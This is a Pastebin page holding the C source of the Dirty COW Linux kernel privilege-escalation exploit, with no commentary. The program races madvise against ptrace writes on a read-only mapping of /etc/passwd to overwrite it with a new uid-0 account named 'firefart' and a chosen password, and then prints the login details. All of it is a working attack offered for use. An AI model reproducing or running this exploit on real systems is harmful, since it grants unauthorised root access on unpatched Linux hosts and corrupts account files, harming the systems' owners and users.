SHARE
TWEET

Untitled

a guest Aug 17th, 2018 47 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include <fcntl.h>
  2. #include <pthread.h>
  3. #include <string.h>
  4. #include <stdio.h>
  5. #include <stdint.h>
  6. #include <sys/mman.h>
  7. #include <sys/types.h>
  8. #include <sys/stat.h>
  9. #include <sys/wait.h>
  10. #include <sys/ptrace.h>
  11. #include <stdlib.h>
  12. #include <unistd.h>
  13. #include <crypt.h>
  14.  
  15. const char *filename = "/etc/passwd";
  16. const char *backup_filename = "/tmp/passwd.bak";
  17. const char *salt = "firefart";
  18.  
  19. int f;
  20. void *map;
  21. pid_t pid;
  22. pthread_t pth;
  23. struct stat st;
  24.  
  25. struct Userinfo {
  26.    char *username;
  27.    char *hash;
  28.    int user_id;
  29.    int group_id;
  30.    char *info;
  31.    char *home_dir;
  32.    char *shell;
  33. };
  34.  
  35. char *generate_password_hash(char *plaintext_pw) {
  36.   return crypt(plaintext_pw, salt);
  37. }
  38.  
  39. char *generate_passwd_line(struct Userinfo u) {
  40.   const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  41.   int size = snprintf(NULL, 0, format, u.username, u.hash,
  42.     u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  43.   char *ret = malloc(size + 1);
  44.   sprintf(ret, format, u.username, u.hash, u.user_id,
  45.     u.group_id, u.info, u.home_dir, u.shell);
  46.   return ret;
  47. }
  48.  
  49. void *madviseThread(void *arg) {
  50.   int i, c = 0;
  51.   for(i = 0; i < 200000000; i++) {
  52.     c += madvise(map, 100, MADV_DONTNEED);
  53.   }
  54.   printf("madvise %d\n\n", c);
  55. }
  56.  
  57. int copy_file(const char *from, const char *to) {
  58.   // check if target file already exists
  59.   if(access(to, F_OK) != -1) {
  60.     printf("File %s already exists! Please delete it and run again\n",
  61.       to);
  62.     return -1;
  63.   }
  64.  
  65.   char ch;
  66.   FILE *source, *target;
  67.  
  68.   source = fopen(from, "r");
  69.   if(source == NULL) {
  70.     return -1;
  71.   }
  72.   target = fopen(to, "w");
  73.   if(target == NULL) {
  74.      fclose(source);
  75.      return -1;
  76.   }
  77.  
  78.   while((ch = fgetc(source)) != EOF) {
  79.      fputc(ch, target);
  80.    }
  81.  
  82.   printf("%s successfully backed up to %s\n",
  83.     from, to);
  84.  
  85.   fclose(source);
  86.   fclose(target);
  87.  
  88.   return 0;
  89. }
  90.  
  91. int main(int argc, char *argv[])
  92. {
  93.   // backup file
  94.   int ret = copy_file(filename, backup_filename);
  95.   if (ret != 0) {
  96.     exit(ret);
  97.   }
  98.  
  99.   struct Userinfo user;
  100.   // set values, change as needed
  101.   user.username = "firefart";
  102.   user.user_id = 0;
  103.   user.group_id = 0;
  104.   user.info = "pwned";
  105.   user.home_dir = "/root";
  106.   user.shell = "/bin/bash";
  107.  
  108.   char *plaintext_pw;
  109.  
  110.   if (argc >= 2) {
  111.     plaintext_pw = argv[1];
  112.     printf("Please enter the new password: %s\n", plaintext_pw);
  113.   } else {
  114.     plaintext_pw = getpass("Please enter the new password: ");
  115.   }
  116.  
  117.   user.hash = generate_password_hash(plaintext_pw);
  118.   char *complete_passwd_line = generate_passwd_line(user);
  119.   printf("Complete line:\n%s\n", complete_passwd_line);
  120.  
  121.   f = open(filename, O_RDONLY);
  122.   fstat(f, &st);
  123.   map = mmap(NULL,
  124.              st.st_size + sizeof(long),
  125.              PROT_READ,
  126.              MAP_PRIVATE,
  127.              f,
  128.              0);
  129.   printf("mmap: %lx\n",(unsigned long)map);
  130.   pid = fork();
  131.   if(pid) {
  132.     waitpid(pid, NULL, 0);
  133.     int u, i, o, c = 0;
  134.     int l=strlen(complete_passwd_line);
  135.     for(i = 0; i < 10000/l; i++) {
  136.       for(o = 0; o < l; o++) {
  137.         for(u = 0; u < 10000; u++) {
  138.           c += ptrace(PTRACE_POKETEXT,
  139.                       pid,
  140.                       map + o,
  141.                       *((long*)(complete_passwd_line + o)));
  142.         }
  143.       }
  144.     }
  145.     printf("ptrace %d\n",c);
  146.   }
  147.   else {
  148.     pthread_create(&pth,
  149.                    NULL,
  150.                    madviseThread,
  151.                    NULL);
  152.     ptrace(PTRACE_TRACEME);
  153.     kill(getpid(), SIGSTOP);
  154.     pthread_join(pth,NULL);
  155.   }
  156.  
  157.   printf("Done! Check %s to see if the new user was created.\n", filename);
  158.   printf("You can log in with the username '%s' and the password '%s'.\n\n",
  159.     user.username, plaintext_pw);
  160.     printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
  161.     backup_filename, filename);
  162.   return 0;
  163. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top